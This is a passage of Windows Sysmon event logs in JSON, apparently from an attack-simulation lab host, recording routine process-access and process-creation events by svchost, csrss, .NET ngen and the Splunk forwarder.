C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.855","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-001076800F00}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.934\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00105C840F00}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.934","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00105C840F00}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7277,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.934\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00105C840F00}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.934","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00105C840F00}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7278,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:52.934\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049C-5F25-0000-00105C840F00}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:52.934","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049C-5F25-0000-00105C840F00}","TargetProcessId":"4536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7279,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nProcessGuid: {A837DB8D-049D-5F25-0000-001032880F00}\r\nProcessId: 3356\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","ProcessGuid":"{A837DB8D-049D-5F25-0000-001032880F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7280,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-001032880F00}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-001032880F00}","TargetProcessId":"3356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7281,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-001032880F00}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-001032880F00}","TargetProcessId":"3356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7282,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7283,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 